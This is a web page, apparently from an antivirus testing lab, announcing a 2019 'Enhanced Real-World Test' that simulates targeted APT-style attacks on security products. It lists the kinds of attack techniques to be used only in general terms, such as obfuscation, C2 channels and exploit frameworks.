This website uses cookies to ensure you get the best experience on our website.
Please note that by continuing to use this site you consent to the terms of our Privacy and Data Protection Policy .
Some of our partner services are located in the United States. According to the case law of the European Court of Justice, there is currently no adequate data protection in the USA. There is a risk that your data will be controlled and monitored by US authorities. You cannot bring any effective legal remedies against this.
Accept

New Test Introduction: Enhanced Real-World Test

New types of threats require new kinds of testing. Therefore, we are introducing a new test, where we use new and tailor-made attacks to compromise a victim. This “Enhanced Real-World Test” will be part of our Public Main Test Series of 2019, in both Consumer and Enterprise Test Series.

Advanced Persistent Threat (APT) is a term commonly used to describe cyber-threats that employ a complex, targeted, and effective attack to steal confidential information. Such attacks are very purposeful, and usually use highly specialized tools. The tools employed include heavily obfuscated malicious code, the malicious use of benign system tools, and non-file-based malicious code.

In our new, additional “Enhanced Real-World Test”, we will be using the latest hacking and penetration techniques that allow attackers to access external computer systems. These attacks can be broken down into Lockheed Martin’s cybersecurity kill chain, and seven distinct phases – each with unique IOCs (Indicators of Compromise) for the victims. The tests will use a subset of the TTP (Tactics, Techniques, Procedures) of the MITRE attack framework.

The following techniques are expected to be employed in the planned malicious attacks:

  • Use of system programs, so as not to trigger signature-based detection
  • Use of popular scripting languages (vba, vbs, bat, PowerShell) as well as compiled binaries
  • Staged and unstaged malware
  • Obfuscation and/or encryption of malicious code before execution (Base64, AES)
  • Different C2 channels to connect to the attacker (HTTP, HTTPS, TCP)
  • Use of known exploit frameworks (Metasploit Framework, Meterpreter, PowerShell Empire, Puppy, etc.).

The tests will take place over the year and results will be published in Q4 of 2019.

Picture credit: Gorodenkoff – stock.adobe.com